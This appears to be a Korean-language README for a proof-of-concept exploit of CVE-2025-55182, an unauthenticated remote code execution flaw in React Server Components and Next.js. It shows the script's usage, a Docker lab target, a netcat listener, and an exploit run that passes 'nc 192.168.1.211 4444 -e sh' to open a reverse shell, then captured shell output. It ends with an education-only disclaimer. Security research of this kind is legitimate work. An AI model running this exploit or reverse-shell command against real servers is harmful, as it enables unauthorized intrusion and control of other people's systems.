
CVE-2025-55182 (React2Shell) PoC: React 19.x 및 Next.js < 15.1.4에 영향을 주는 인증되지 않은 원격 코드 실행(RCE). RSC Flight 프로토콜의 취약점을 악용합니다.
React Server Components 19.0.0, 19.1.0, 19.1.1 및 19.2.0 버전에는 사전 인증 원격 코드 실행 취약점이 존재하며, 여기에는 다음 패키지가 포함됩니다: react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack. 취약한 코드는 Server Function 엔드포인트로 전송되는 HTTP 요청의 페이로드를 안전하지 않게 역직렬화합니다.
https://nvd.nist.gov/vuln/detail/CVE-2025-55182
usage: CVE-2025-55182.py [-h] --command COMMAND target
PoC exploit: CVE-2025-55182
positional arguments:
target Target hostname
options:
-h, --help show this help message and exit
--command COMMAND Command to run on target
# Create docker instance
docker run -d -p 3000:3000 ihsansencan/react2shell:cve-2025-55182
# Start listener
nc -lnvp 4444
# Launch exploit
python3 CVE-2025-55182.py http://127.0.0.1:3000/ --command "nc 192.168.1.211 4444 -e sh"
# Should receive reverse shell in listener
Listening on 0.0.0.0 4444
Connection received on 172.17.0.2 43911
uname -a
Linux f346806b6f59 6.17.0-20-generic #20~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Mar 19 01:28:37 UTC 2 x86_64 Linux
이 프로젝트는 교육 및 연구 목적으로만 제공됩니다. 작성자는 이 코드로 인한 오용 또는 손해에 대해 책임을 지지 않습니다.